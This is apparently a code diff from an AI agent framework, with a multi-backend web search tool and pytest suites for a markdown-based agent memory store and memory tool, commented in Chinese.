||||||
|
|
||||||
|
import httpx
|
||||||
|
|
||||||
|
from agentkit.tools.base import Tool
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class WebSearchTool(Tool):
|
||||||
|
"""通用网页搜索工具。
|
||||||
|
|
||||||
|
支持三种后端,按优先级降级:
|
||||||
|
- Tavily API(高质量,需 key)
|
||||||
|
- Serper API(Google 结果,需 key)
|
||||||
|
- DuckDuckGo Lite(免费降级方案)
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(
|
||||||
|
self,
|
||||||
|
name: str = "web_search",
|
||||||
|
description: str = "搜索互联网信息。返回搜索结果列表,包含标题、链接和摘要。",
|
||||||
|
input_schema: dict[str, Any] | None = None,
|
||||||
|
output_schema: dict[str, Any] | None = None,
|
||||||
|
version: str = "1.0.0",
|
||||||
|
tags: list[str] | None = None,
|
||||||
|
tavily_api_key: str | None = None,
|
||||||
|
serper_api_key: str | None = None,
|
||||||
|
default_max_results: int = 5,
|
||||||
|
):
|
||||||
|
super().__init__(
|
||||||
|
name=name,
|
||||||
|
description=description,
|
||||||
|
input_schema=input_schema or self._default_input_schema(),
|
||||||
|
output_schema=output_schema or self._default_output_schema(),
|
||||||
|
version=version,
|
||||||
|
tags=tags or ["search", "web"],
|
||||||
|
)
|
||||||
|
self._tavily_key = tavily_api_key
|
||||||
|
self._serper_key = serper_api_key
|
||||||
|
self._default_max_results = default_max_results
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _default_input_schema() -> dict[str, Any]:
|
||||||
|
return {
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"query": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "搜索关键词",
|
||||||
|
},
|
||||||
|
"max_results": {
|
||||||
|
"type": "integer",
|
||||||
|
"description": "最大返回结果数(默认 5)",
|
||||||
|
"default": 5,
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"required": ["query"],
|
||||||
|
}
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _default_output_schema() -> dict[str, Any]:
|
||||||
|
return {
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"results": {
|
||||||
|
"type": "array",
|
||||||
|
"items": {
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"title": {"type": "string"},
|
||||||
|
"url": {"type": "string"},
|
||||||
|
"snippet": {"type": "string"},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"description": "搜索结果列表",
|
||||||
|
},
|
||||||
|
"total": {"type": "integer", "description": "结果总数"},
|
||||||
|
"backend": {"type": "string", "description": "使用的搜索后端"},
|
||||||
|
"success": {"type": "boolean", "description": "是否成功"},
|
||||||
|
"error": {"type": "string", "description": "错误信息(仅失败时)"},
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
async def execute(self, **kwargs) -> dict:
|
||||||
|
"""执行网页搜索。"""
|
||||||
|
query = kwargs.get("query")
|
||||||
|
if not query:
|
||||||
|
return {"error": "query 参数是必需的", "results": [], "total": 0, "success": False}
|
||||||
|
|
||||||
|
max_results = kwargs.get("max_results", self._default_max_results)
|
||||||
|
|
||||||
|
# Try backends in priority order
|
||||||
|
if self._tavily_key:
|
||||||
|
result = await self._search_tavily(query, max_results)
|
||||||
|
if result.get("success"):
|
||||||
|
return result
|
||||||
|
logger.warning(f"Tavily search failed, falling back: {result.get('error')}")
|
||||||
|
|
||||||
|
if self._serper_key:
|
||||||
|
result = await self._search_serper(query, max_results)
|
||||||
|
if result.get("success"):
|
||||||
|
return result
|
||||||
|
logger.warning(f"Serper search failed, falling back: {result.get('error')}")
|
||||||
|
|
||||||
|
# Fallback: DuckDuckGo
|
||||||
|
return await self._search_duckduckgo(query, max_results)
|
||||||
|
|
||||||
|
async def _search_tavily(self, query: str, max_results: int) -> dict:
|
||||||
|
"""Tavily API search."""
|
||||||
|
try:
|
||||||
|
async with httpx.AsyncClient(timeout=15) as client:
|
||||||
|
resp = await client.post(
|
||||||
|
"https://api.tavily.com/search",
|
||||||
|
json={
|
||||||
|
"api_key": self._tavily_key,
|
||||||
|
"query": query,
|
||||||
|
"max_results": max_results,
|
||||||
|
"search_depth": "basic",
|
||||||
|
},
|
||||||
|
)
|
||||||
|
resp.raise_for_status()
|
||||||
|
data = resp.json()
|
||||||
|
|
||||||
|
results = []
|
||||||
|
for item in data.get("results", [])[:max_results]:
|
||||||
|
results.append({
|
||||||
|
"title": item.get("title", ""),
|
||||||
|
"url": item.get("url", ""),
|
||||||
|
"snippet": item.get("content", "")[:300],
|
||||||
|
})
|
||||||
|
|
||||||
|
return {"results": results, "total": len(results), "backend": "tavily", "success": True}
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Tavily search error: {e}")
|
||||||
|
return {"error": str(e), "results": [], "total": 0, "success": False}
|
||||||
|
|
||||||
|
async def _search_serper(self, query: str, max_results: int) -> dict:
|
||||||
|
"""Serper API (Google) search."""
|
||||||
|
try:
|
||||||
|
async with httpx.AsyncClient(timeout=15) as client:
|
||||||
|
resp = await client.post(
|
||||||
|
"https://google.serper.dev/search",
|
||||||
|
json={"q": query, "num": max_results},
|
||||||
|
headers={"X-API-KEY": self._serper_key},
|
||||||
|
)
|
||||||
|
resp.raise_for_status()
|
||||||
|
data = resp.json()
|
||||||
|
|
||||||
|
results = []
|
||||||
|
for item in data.get("organic", [])[:max_results]:
|
||||||
|
results.append({
|
||||||
|
"title": item.get("title", ""),
|
||||||
|
"url": item.get("link", ""),
|
||||||
|
"snippet": item.get("snippet", "")[:300],
|
||||||
|
})
|
||||||
|
|
||||||
|
return {"results": results, "total": len(results), "backend": "serper", "success": True}
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Serper search error: {e}")
|
||||||
|
return {"error": str(e), "results": [], "total": 0, "success": False}
|
||||||
|
|
||||||
|
async def _search_duckduckgo(self, query: str, max_results: int) -> dict:
|
||||||
|
"""DuckDuckGo Lite search (free, no API key needed).
|
||||||
|
|
||||||
|
Parses the HTML response from DuckDuckGo Lite.
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
encoded_query = urllib.parse.quote(query)
|
||||||
|
url = f"https://lite.duckduckgo.com/lite/?q={encoded_query}"
|
||||||
|
|
||||||
|
async with httpx.AsyncClient(timeout=15, follow_redirects=True) as client:
|
||||||
|
resp = await client.get(
|
||||||
|
url,
|
||||||
|
headers={
|
||||||
|
"User-Agent": (
|
||||||
|
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
|
||||||
|
"AppleWebKit/537.36 (KHTML, like Gecko) "
|
||||||
|
"Chrome/120.0.0.0 Safari/537.36"
|
||||||
|
),
|
||||||
|
},
|
||||||
|
)
|
||||||
|
html = resp.text
|
||||||
|
|
||||||
|
results = self._parse_duckduckgo_html(html, max_results)
|
||||||
|
|
||||||
|
return {"results": results, "total": len(results), "backend": "duckduckgo", "success": True}
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"DuckDuckGo search error: {e}")
|
||||||
|
return {
|
||||||
|
"error": f"Search unavailable: {e}",
|
||||||
|
"results": [],
|
||||||
|
"total": 0,
|
||||||
|
"backend": "duckduckgo",
|
||||||
|
"success": False,
|
||||||
|
}
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _parse_duckduckgo_html(html: str, max_results: int) -> list[dict[str, str]]:
|
||||||
|
"""Parse DuckDuckGo Lite HTML to extract search results."""
|
||||||
|
results: list[dict[str, str]] = []
|
||||||
|
|
||||||
|
# DuckDuckGo Lite uses <a class="result-link"> for titles
|
||||||
|
# and <td class="result-snippet"> for snippets
|
||||||
|
# Pattern: find result-link anchors, then find the next snippet
|
||||||
|
link_pattern = re.compile(
|
||||||
|
r'<a[^>]*class="result-link"[^>]*href="([^"]*)"[^>]*>(.*?)</a>',
|
||||||
|
re.DOTALL,
|
||||||
|
)
|
||||||
|
snippet_pattern = re.compile(
|
||||||
|
r'<td[^>]*class="result-snippet"[^>]*>(.*?)</td>',
|
||||||
|
re.DOTALL,
|
||||||
|
)
|
||||||
|
|
||||||
|
links = list(link_pattern.finditer(html))
|
||||||
|
snippets = list(snippet_pattern.finditer(html))
|
||||||
|
|
||||||
|
for i, match in enumerate(links):
|
||||||
|
if len(results) >= max_results:
|
||||||
|
break
|
||||||
|
|
||||||
|
url = match.group(1)
|
||||||
|
title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
|
||||||
|
|
||||||
|
# Skip ad/tracking links
|
||||||
|
if not url.startswith("http") or "duckduckgo.com" in url:
|
||||||
|
continue
|
||||||
|
|
||||||
|
snippet = ""
|
||||||
|
if i < len(snippets):
|
||||||
|
snippet = re.sub(r"<[^>]+>", "", snippets[i].group(1)).strip()
|
||||||
|
|
||||||
|
results.append({
|
||||||
|
"title": title[:200],
|
||||||
|
"url": url,
|
||||||
|
"snippet": snippet[:300],
|
||||||
|
})
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
@ -0,0 +1,102 @@
|
||||||
|
"""Tests for Chat memory integration — 记忆注入 + MemoryTool + 日志生成 (U4)."""
|
||||||
|
|
||||||
|
from pathlib import Path
|
||||||
|
from unittest.mock import AsyncMock, MagicMock, patch
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
|
||||||
|
from agentkit.memory.profile import MemoryStore, MemorySnapshot
|
||||||
|
from agentkit.tools.memory_tool import MemoryTool
|
||||||
|
|
||||||
|
|
||||||
|
class TestChatMemoryInjection:
|
||||||
|
"""Chat 启动时记忆注入 system prompt 测试."""
|
||||||
|
|
||||||
|
def test_memory_store_initializes_with_base_dir(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
store.ensure_defaults()
|
||||||
|
snapshot = store.load_all()
|
||||||
|
prompt = store.build_system_prompt(snapshot, "Be helpful.")
|
||||||
|
assert "<agent-identity>" in prompt
|
||||||
|
assert "AgentKit" in prompt
|
||||||
|
assert "Be helpful." in prompt
|
||||||
|
|
||||||
|
def test_no_memory_files_returns_base_prompt(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
snapshot = store.load_all()
|
||||||
|
prompt = store.build_system_prompt(snapshot, "Be helpful.")
|
||||||
|
assert prompt == "Be helpful."
|
||||||
|
|
||||||
|
def test_default_soul_injected(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
store.ensure_defaults()
|
||||||
|
snapshot = store.load_all()
|
||||||
|
prompt = store.build_system_prompt(snapshot)
|
||||||
|
assert "<agent-identity>" in prompt
|
||||||
|
assert "专业" in prompt or "AgentKit" in prompt
|
||||||
|
|
||||||
|
|
||||||
|
class TestChatMemoryToolAvailable:
|
||||||
|
"""MemoryTool 在对话中可用测试."""
|
||||||
|
|
||||||
|
async def test_memory_tool_in_tools_list(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
tool = MemoryTool(memory_store=store)
|
||||||
|
assert tool.name == "memory"
|
||||||
|
assert tool.input_schema is not None
|
||||||
|
|
||||||
|
async def test_memory_tool_add_and_read(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
tool = MemoryTool(memory_store=store)
|
||||||
|
# Add
|
||||||
|
result = await tool.execute(action="add", file="user", section="称呼", content="叫我老板")
|
||||||
|
assert result["success"] is True
|
||||||
|
# Read
|
||||||
|
result = await tool.execute(action="read", file="user")
|
||||||
|
assert "老板" in result["content"]
|
||||||
|
|
||||||
|
|
||||||
|
class TestChatMemoryPersistence:
|
||||||
|
"""记忆跨 /clear 会话持久化测试."""
|
||||||
|
|
||||||
|
def test_memory_survives_session_clear(self, tmp_path: Path):
|
||||||
|
"""/clear 只清除会话历史,不清除记忆文件."""
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
store.get_file("user").write("## 称呼\n叫我老板")
|
||||||
|
|
||||||
|
# 模拟 /clear — 重新创建 MemoryStore
|
||||||
|
store2 = MemoryStore(base_dir=tmp_path)
|
||||||
|
content = store2.get_file("user").read()
|
||||||
|
assert "老板" in content
|
||||||
|
|
||||||
|
def test_memory_persists_across_store_instances(self, tmp_path: Path):
|
||||||
|
store1 = MemoryStore(base_dir=tmp_path)
|
||||||
|
store1.get_file("memory").write("## 项目\nAgentKit框架")
|
||||||
|
|
||||||
|
store2 = MemoryStore(base_dir=tmp_path)
|
||||||
|
content = store2.get_file("memory").read()
|
||||||
|
assert "AgentKit" in content
|
||||||
|
|
||||||
|
|
||||||
|
class TestChatDailyLogGeneration:
|
||||||
|
"""会话结束时日志生成测试."""
|
||||||
|
|
||||||
|
def test_daily_file_path_is_today(self, tmp_path: Path):
|
||||||
|
from datetime import datetime, timezone
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
daily = store.get_file("daily")
|
||||||
|
today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
|
||||||
|
assert today in str(daily.path)
|
||||||
|
|
||||||
|
def test_write_daily_log(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
daily = store.get_file("daily")
|
||||||
|
daily.write("讨论了AgentKit记忆系统架构")
|
||||||
|
content = daily.read()
|
||||||
|
assert "记忆系统" in content
|
||||||
|
|
||||||
|
def test_daily_log_loads_in_snapshot(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
store.get_file("daily").write("今天完成了记忆系统开发")
|
||||||
|
snapshot = store.load_all()
|
||||||
|
assert "记忆系统" in snapshot.daily
|
||||||
|
|
@ -0,0 +1,249 @@
|
||||||
|
"""Tests for MemoryFile + MemoryStore — 记忆文件读写与多文件管理 (U1+U2)."""
|
||||||
|
|
||||||
|
import tempfile
|
||||||
|
from datetime import datetime, timedelta, timezone
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
|
||||||
|
from agentkit.memory.profile import MemoryFile, MemoryStore, MemorySnapshot
|
||||||
|
|
||||||
|
|
||||||
|
class TestMemoryFileBasicIO:
|
||||||
|
"""MemoryFile 基本读写测试."""
|
||||||
|
|
||||||
|
def test_read_nonexistent_file_returns_empty(self, tmp_path: Path):
|
||||||
|
mf = MemoryFile(tmp_path / "no_such.md")
|
||||||
|
assert mf.read() == ""
|
||||||
|
|
||||||
|
def test_write_and_read_back(self, tmp_path: Path):
|
||||||
|
mf = MemoryFile(tmp_path / "test.md")
|
||||||
|
mf.write("hello world")
|
||||||
|
assert mf.read() == "hello world"
|
||||||
|
|
||||||
|
def test_write_creates_parent_dirs(self, tmp_path: Path):
|
||||||
|
mf = MemoryFile(tmp_path / "deep" / "nested" / "test.md")
|
||||||
|
mf.write("content")
|
||||||
|
assert mf.read() == "content"
|
||||||
|
|
||||||
|
def test_overwrite_existing(self, tmp_path: Path):
|
||||||
|
mf = MemoryFile(tmp_path / "test.md")
|
||||||
|
mf.write("first")
|
||||||
|
mf.write("second")
|
||||||
|
assert mf.read() == "second"
|
||||||
|
|
||||||
|
|
||||||
|
class TestMemoryFileSections:
|
||||||
|
"""MemoryFile section 级别操作测试."""
|
||||||
|
|
||||||
|
def _make_file(self, tmp_path: Path, content: str) -> MemoryFile:
|
||||||
|
mf = MemoryFile(tmp_path / "test.md")
|
||||||
|
mf.write(content)
|
||||||
|
return mf
|
||||||
|
|
||||||
|
def test_read_section_from_empty_file(self, tmp_path: Path):
|
||||||
|
mf = MemoryFile(tmp_path / "empty.md")
|
||||||
|
assert mf.read_section("身份") == ""
|
||||||
|
|
||||||
|
def test_read_section_returns_content(self, tmp_path: Path):
|
||||||
|
mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心")
|
||||||
|
assert mf.read_section("身份") == "我是小王"
|
||||||
|
|
||||||
|
def test_read_section_not_found_returns_empty(self, tmp_path: Path):
|
||||||
|
mf = self._make_file(tmp_path, "## 身份\n我是小王")
|
||||||
|
assert mf.read_section("不存在") == ""
|
||||||
|
|
||||||
|
def test_add_section_creates_new(self, tmp_path: Path):
|
||||||
|
mf = self._make_file(tmp_path, "## 身份\n我是小王")
|
||||||
|
mf.add_section("性格", "友好耐心")
|
||||||
|
assert mf.read_section("性格") == "友好耐心"
|
||||||
|
assert mf.read_section("身份") == "我是小王"
|
||||||
|
|
||||||
|
def test_add_section_appends_to_existing(self, tmp_path: Path):
|
||||||
|
mf = self._make_file(tmp_path, "## 身份\n我是小王")
|
||||||
|
mf.add_section("身份", "也是AI助手")
|
||||||
|
content = mf.read_section("身份")
|
||||||
|
assert "我是小王" in content
|
||||||
|
assert "也是AI助手" in content
|
||||||
|
|
||||||
|
def test_replace_section_text(self, tmp_path: Path):
|
||||||
|
mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心")
|
||||||
|
mf.replace_section("身份", "我是小王", "我是大王")
|
||||||
|
assert mf.read_section("身份") == "我是大王"
|
||||||
|
assert mf.read_section("性格") == "友好耐心"
|
||||||
|
|
||||||
|
def test_replace_section_old_not_found_returns_false(self, tmp_path: Path):
|
||||||
|
mf = self._make_file(tmp_path, "## 身份\n我是小王")
|
||||||
|
result = mf.replace_section("身份", "不存在", "新内容")
|
||||||
|
assert result is False
|
||||||
|
|
||||||
|
def test_remove_section(self, tmp_path: Path):
|
||||||
|
mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心")
|
||||||
|
mf.remove_section("身份")
|
||||||
|
assert mf.read_section("身份") == ""
|
||||||
|
assert mf.read_section("性格") == "友好耐心"
|
||||||
|
|
||||||
|
def test_remove_nonexistent_section_no_error(self, tmp_path: Path):
|
||||||
|
mf = self._make_file(tmp_path, "## 身份\n我是小王")
|
||||||
|
mf.remove_section("不存在") # 不抛异常
|
||||||
|
assert mf.read_section("身份") == "我是小王"
|
||||||
|
|
||||||
|
def test_list_sections(self, tmp_path: Path):
|
||||||
|
mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心")
|
||||||
|
sections = mf.list_sections()
|
||||||
|
assert sections == ["身份", "性格"]
|
||||||
|
|
||||||
|
|
||||||
|
class TestMemoryFileCapacity:
|
||||||
|
"""MemoryFile 容量管理测试."""
|
||||||
|
|
||||||
|
def test_trim_to_budget_keeps_content_within_limit(self, tmp_path: Path):
|
||||||
|
mf = MemoryFile(tmp_path / "test.md", char_budget=20)
|
||||||
|
mf.write("## 身份\n我是小王一个专业的AI助手") # 超过 20 字符
|
||||||
|
mf.trim_to_budget()
|
||||||
|
content = mf.read()
|
||||||
|
assert len(content) <= 20
|
||||||
|
|
||||||
|
def test_trim_preserves_earlier_sections(self, tmp_path: Path):
|
||||||
|
mf = MemoryFile(tmp_path / "test.md", char_budget=30)
|
||||||
|
mf.write("## 身份\n我是小王\n## 性格\n友好耐心注重细节") # 性格部分超限
|
||||||
|
mf.trim_to_budget()
|
||||||
|
content = mf.read()
|
||||||
|
assert "身份" in content # 保留前面的 section
|
||||||
|
|
||||||
|
def test_no_trim_when_within_budget(self, tmp_path: Path):
|
||||||
|
mf = MemoryFile(tmp_path / "test.md", char_budget=1000)
|
||||||
|
mf.write("## 身份\n我是小王")
|
||||||
|
mf.trim_to_budget()
|
||||||
|
assert mf.read() == "## 身份\n我是小王"
|
||||||
|
|
||||||
|
def test_write_auto_trims(self, tmp_path: Path):
|
||||||
|
mf = MemoryFile(tmp_path / "test.md", char_budget=15)
|
||||||
|
mf.write("## 身份\n我是小王一个专业的AI助手非常长")
|
||||||
|
content = mf.read()
|
||||||
|
assert len(content) <= 15
|
||||||
|
|
||||||
|
|
||||||
|
class TestMemoryStoreInit:
|
||||||
|
"""MemoryStore 初始化测试."""
|
||||||
|
|
||||||
|
def test_init_creates_base_dir(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path / "new_dir")
|
||||||
|
assert (tmp_path / "new_dir").exists()
|
||||||
|
|
||||||
|
def test_init_creates_memories_subdir(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
assert (tmp_path / "memories").exists()
|
||||||
|
|
||||||
|
def test_init_creates_daily_subdir(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
assert (tmp_path / "memories" / "daily").exists()
|
||||||
|
|
||||||
|
|
||||||
|
class TestMemoryStoreLoadAll:
|
||||||
|
"""MemoryStore load_all 测试."""
|
||||||
|
|
||||||
|
def test_load_all_returns_snapshot(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
snapshot = store.load_all()
|
||||||
|
assert isinstance(snapshot, MemorySnapshot)
|
||||||
|
|
||||||
|
def test_load_all_empty_when_no_files(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
snapshot = store.load_all()
|
||||||
|
assert snapshot.is_empty()
|
||||||
|
|
||||||
|
def test_load_all_with_content(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
store.get_file("soul").write("## 身份\n我是小王")
|
||||||
|
store.get_file("user").write("## 称呼\n叫我老板")
|
||||||
|
snapshot = store.load_all()
|
||||||
|
assert "小王" in snapshot.soul
|
||||||
|
assert "老板" in snapshot.user
|
||||||
|
assert snapshot.total_chars > 0
|
||||||
|
|
||||||
|
|
||||||
|
class TestMemoryStoreBuildPrompt:
|
||||||
|
"""MemoryStore build_system_prompt 测试."""
|
||||||
|
|
||||||
|
def test_build_prompt_injects_all_sections(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
store.get_file("soul").write("## 身份\n我是小王")
|
||||||
|
store.get_file("user").write("## 称呼\n叫我老板")
|
||||||
|
snapshot = store.load_all()
|
||||||
|
prompt = store.build_system_prompt(snapshot, "Be helpful.")
|
||||||
|
assert "<agent-identity>" in prompt
|
||||||
|
assert "小王" in prompt
|
||||||
|
assert "<user-profile>" in prompt
|
||||||
|
assert "老板" in prompt
|
||||||
|
assert "Be helpful." in prompt
|
||||||
|
|
||||||
|
def test_build_prompt_no_memory_returns_base_only(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
snapshot = store.load_all()
|
||||||
|
prompt = store.build_system_prompt(snapshot, "Be helpful.")
|
||||||
|
assert prompt == "Be helpful."
|
||||||
|
|
||||||
|
def test_build_prompt_empty_base_with_memory(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
store.get_file("soul").write("## 身份\n我是小王")
|
||||||
|
snapshot = store.load_all()
|
||||||
|
prompt = store.build_system_prompt(snapshot)
|
||||||
|
assert "<agent-identity>" in prompt
|
||||||
|
assert "小王" in prompt
|
||||||
|
|
||||||
|
|
||||||
|
class TestMemoryStoreDefaults:
|
||||||
|
"""MemoryStore ensure_defaults 测试."""
|
||||||
|
|
||||||
|
def test_ensure_defaults_creates_soul(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
store.ensure_defaults()
|
||||||
|
soul = store.get_file("soul").read()
|
||||||
|
assert "AgentKit" in soul
|
||||||
|
|
||||||
|
def test_ensure_defaults_no_overwrite(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
store.get_file("soul").write("## 身份\n自定义内容")
|
||||||
|
store.ensure_defaults()
|
||||||
|
soul = store.get_file("soul").read()
|
||||||
|
assert "自定义内容" in soul
|
||||||
|
assert "AgentKit" not in soul
|
||||||
|
|
||||||
|
|
||||||
|
class TestMemoryStoreDailyLogs:
|
||||||
|
"""MemoryStore 日志管理测试."""
|
||||||
|
|
||||||
|
def test_load_daily_logs_empty(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
assert store.load_daily_logs() == ""
|
||||||
|
|
||||||
|
def test_load_daily_logs_with_today(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
|
||||||
|
daily_file = MemoryFile(tmp_path / "memories" / "daily" / f"{today}.md")
|
||||||
|
daily_file.write("讨论了项目架构")
|
||||||
|
logs = store.load_daily_logs()
|
||||||
|
assert "讨论了项目架构" in logs
|
||||||
|
|
||||||
|
def test_archive_old_dailies(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
# 创建一个旧日志
|
||||||
|
old_date = (datetime.now(timezone.utc) - timedelta(days=5)).strftime("%Y-%m-%d")
|
||||||
|
old_file = tmp_path / "memories" / "daily" / f"{old_date}.md"
|
||||||
|
old_file.parent.mkdir(parents=True, exist_ok=True)
|
||||||
|
old_file.write_text("旧日志", encoding="utf-8")
|
||||||
|
count = store.archive_old_dailies(keep_days=2)
|
||||||
|
assert count == 1
|
||||||
|
assert not old_file.exists()
|
||||||
|
|
||||||
|
def test_get_file_daily_returns_today(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
daily = store.get_file("daily")
|
||||||
|
today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
|
||||||
|
assert today in str(daily.path)
|
||||||
|
|
||||||
|
def test_get_file_invalid_key_raises(self, tmp_path: Path):
|
||||||
|
store = MemoryStore(base_dir=tmp_path)
|
||||||
|
with pytest.raises(ValueError, match="Invalid file_key"):
|
||||||
|
store.get_file("invalid")
|
||||||
|
|
@ -0,0 +1,112 @@
|
||||||
|
"""Tests for MemoryTool — Agent 可调用的记忆操作工具 (U3)."""
|
||||||
|
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
|
||||||
|
from agentkit.memory.profile import MemoryStore
|
||||||
|
from agentkit.tools.memory_tool import MemoryTool
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture
|
||||||
|
def store(tmp_path: Path) -> MemoryStore:
|
||||||
|
return MemoryStore(base_dir=tmp_path)
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture
|
||||||
|
def tool(store: MemoryStore) -> MemoryTool:
|
||||||
|
return MemoryTool(memory_store=store)
|
||||||
|
|
||||||
|
|
||||||
|
class TestMemoryToolAdd:
|
||||||
|
"""memory_add 操作测试."""
|
||||||
|
|
||||||
|
async def test_add_creates_new_section(self, tool: MemoryTool, store: MemoryStore):
|
||||||
|
result = await tool.execute(action="add", file="memory", section="项目信息", content="使用Python和FastAPI")
|
||||||
|
assert result["success"] is True
|
||||||
|
content = store.get_file("memory").read_section("项目信息")
|
||||||
|
assert "Python和FastAPI" in content
|
||||||
|
|
||||||
|
async def test_add_appends_to_existing_section(self, tool: MemoryTool, store: MemoryStore):
|
||||||
|
store.get_file("memory").write("## 项目信息\n使用Python")
|
||||||
|
result = await tool.execute(action="add", file="memory", section="项目信息", content="还有TypeScript")
|
||||||
|
assert result["success"] is True
|
||||||
|
content = store.get_file("memory").read_section("项目信息")
|
||||||
|
assert "Python" in content
|
||||||
|
assert "TypeScript" in content
|
||||||
|
|
||||||
|
async def test_add_to_soul(self, tool: MemoryTool, store: MemoryStore):
|
||||||
|
result = await tool.execute(action="add", file="soul", section="爱好", content="编程和阅读")
|
||||||
|
assert result["success"] is True
|
||||||
|
assert "编程和阅读" in store.get_file("soul").read_section("爱好")
|
||||||
|
|
||||||
|
|
||||||
|
class TestMemoryToolReplace:
|
||||||
|
"""memory_replace 操作测试."""
|
||||||
|
|
||||||
|
async def test_replace_text_in_section(self, tool: MemoryTool, store: MemoryStore):
|
||||||
|
store.get_file("memory").write("## 项目信息\n使用Python\n## 团队\n3人")
|
||||||
|
result = await tool.execute(
|
||||||
|
action="replace", file="memory", section="项目信息",
|
||||||
|
old_text="Python", new_text="Rust"
|
||||||
|
)
|
||||||
|
assert result["success"] is True
|
||||||
|
assert "Rust" in store.get_file("memory").read_section("项目信息")
|
||||||
|
assert "3人" in store.get_file("memory").read_section("团队")
|
||||||
|
|
||||||
|
async def test_replace_old_not_found_fails(self, tool: MemoryTool, store: MemoryStore):
|
||||||
|
store.get_file("memory").write("## 项目信息\n使用Python")
|
||||||
|
result = await tool.execute(
|
||||||
|
action="replace", file="memory", section="项目信息",
|
||||||
|
old_text="不存在", new_text="新内容"
|
||||||
|
)
|
||||||
|
assert result["success"] is False
|
||||||
|
assert "not found" in result.get("error", "").lower()
|
||||||
|
|
||||||
|
|
||||||
|
class TestMemoryToolRemove:
|
||||||
|
"""memory_remove 操作测试."""
|
||||||
|
|
||||||
|
async def test_remove_section(self, tool: MemoryTool, store: MemoryStore):
|
||||||
|
store.get_file("memory").write("## 项目信息\n使用Python\n## 团队\n3人")
|
||||||
|
result = await tool.execute(action="remove", file="memory", section="项目信息")
|
||||||
|
assert result["success"] is True
|
||||||
|
assert store.get_file("memory").read_section("项目信息") == ""
|
||||||
|
assert "3人" in store.get_file("memory").read_section("团队")
|
||||||
|
|
||||||
|
|
||||||
|
class TestMemoryToolRead:
|
||||||
|
"""memory_read 操作测试."""
|
||||||
|
|
||||||
|
async def test_read_file_content(self, tool: MemoryTool, store: MemoryStore):
|
||||||
|
store.get_file("memory").write("## 项目信息\n使用Python")
|
||||||
|
result = await tool.execute(action="read", file="memory")
|
||||||
|
assert result["success"] is True
|
||||||
|
assert "Python" in result["content"]
|
||||||
|
|
||||||
|
async def test_read_empty_file(self, tool: MemoryTool, store: MemoryStore):
|
||||||
|
result = await tool.execute(action="read", file="memory")
|
||||||
|
assert result["success"] is True
|
||||||
|
assert result["content"] == ""
|
||||||
|
|
||||||
|
|
||||||
|
